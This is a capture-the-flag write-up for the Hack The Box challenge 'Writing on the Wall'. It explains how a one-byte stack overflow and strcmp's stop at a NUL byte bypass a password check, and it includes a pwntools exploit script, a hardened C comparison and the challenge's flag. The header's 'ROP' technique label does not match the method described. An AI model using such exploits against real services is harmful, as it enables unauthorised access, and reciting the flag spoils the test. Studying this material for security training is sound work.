Writing on the Wall

  • Difficulty: Very Easy
  • Technique: ROP

As you approach a password-protected door, a sense of uncertainty envelops you—no clues, no hints. Yet, just as confusion takes hold, your gaze locks onto cryptic markings adorning the nearby wall. Could this be the elusive password, waiting to unveil the door's secrets?

Approach

Check protections

Command:

$ checksec --file=writing_on_the_wall

Output:

Arch:     amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
RUNPATH: b'./glibc/'

Disassemble binary

main function's pseudocode:

int __cdecl main(int argc, const char **argv, const char **envp)
{
    char buf[6]; // [rsp+Ah] [rbp-16h] BYREF
    char s2[8]; // [rsp+10h] [rbp-10h] BYREF
    unsigned __int64 v6; // [rsp+18h] [rbp-8h]

    v6 = __readfsqword(0x28u);
    *(_QWORD *)s2 = 0x2073736170743377LL;
    read(0, buf, 7uLL);
    if ( !strcmp(buf, s2) )
        open_door();
    else
        error("You activated the alarm! Troops are coming your way, RUN!\n");
    return 0;
}

Buffer overflow vulnerability detected.

  • The buffer buf is declared with a length of 6.
  • However, read copies 7 bytes from stdin into it.
  • This lets us overflow one byte from buf into the first byte of s2, which sits directly after buf on the stack.

Exploit

  • The weakness lies in the use of strcmp, which stops comparing as soon as it reaches a NULL byte.
  • We can exploit this by filling our buffer and the overflow byte with NULL bytes.
  • strcmp compares s2 and buf byte by byte.
  • Since the first byte of both s2 and buf is a NULL byte, strcmp stops at the first byte and returns 0 (reporting that the strings in buf and s2 are equal).
  • This calls open_door() and lets us obtain the flag for this challenge.

Remarks: Pretty simple challenge which exploits the strcmp function.
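Added example (not the challenge's or the author's code): a C reproduction of the check on a constructed stack frame, next to a hardened version that bounds the copy and compares a fixed length. The frame layout, the function names and the zeroed canary stand-in are assumptions made for this example.

```c
#include <stdint.h>
#include <string.h>

/* Re-creates the layout from the decompiled main(): buf[6] sits directly
 * below s2[8], and the stack canary (low byte always 0) follows s2.
 * On amd64 the little-endian bytes of SECRET spell "w3tpass ". */
#define SECRET 0x2073736170743377ULL   /* the value written into s2 */

struct frame {
    char buf[6];
    char s2[8];
    char canary_stub[8];   /* stands in for the canary; zeroed so strcmp stops */
};

/* Vulnerable check, as in the binary: read(0, buf, 7) writes the 7th byte
 * into s2[0], then strcmp compares two arrays that are not NUL-terminated.
 * Returns 1 if open_door() would be called. */
int vulnerable_check(const unsigned char *input, size_t n)
{
    struct frame f;
    uint64_t secret = SECRET;
    memset(&f, 0, sizeof f);
    memcpy(f.s2, &secret, sizeof secret);
    if (n > 7) n = 7;                 /* read(0, buf, 7) accepts at most 7 bytes */
    memcpy(f.buf, input, n);          /* byte 7 lands on s2[0] */
    return strcmp(f.buf, f.s2) == 0;  /* a leading NUL in both makes them "equal" */
}

/* Hardened check: the copy is bounded by the destination size and the
 * comparison is a fixed-length memcmp, so a NUL byte cannot cut it short. */
int hardened_check(const unsigned char *input, size_t n)
{
    unsigned char buf[8];
    uint64_t secret = SECRET;
    if (n != sizeof buf) return 0;    /* wrong length can never match */
    memcpy(buf, input, sizeof buf);   /* never writes past buf */
    return memcmp(buf, &secret, sizeof secret) == 0;
}
```

Seven NUL bytes satisfy vulnerable_check but not hardened_check; only the exact 8-byte secret satisfies the hardened version.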

Script

from pwn import *

r = remote('83.136.248.36', 36704)

payload = b'\x00' # first byte in 'buf': terminates buf immediately
payload += b'\x00'*5 # pad the remaining 5 bytes of 'buf'
payload += b'\x00' # 7th byte: overwrites the first byte of 's2'

r.sendline(payload)
r.interactive()

Flag

HTB{3v3ryth1ng_15_r34d4bl3}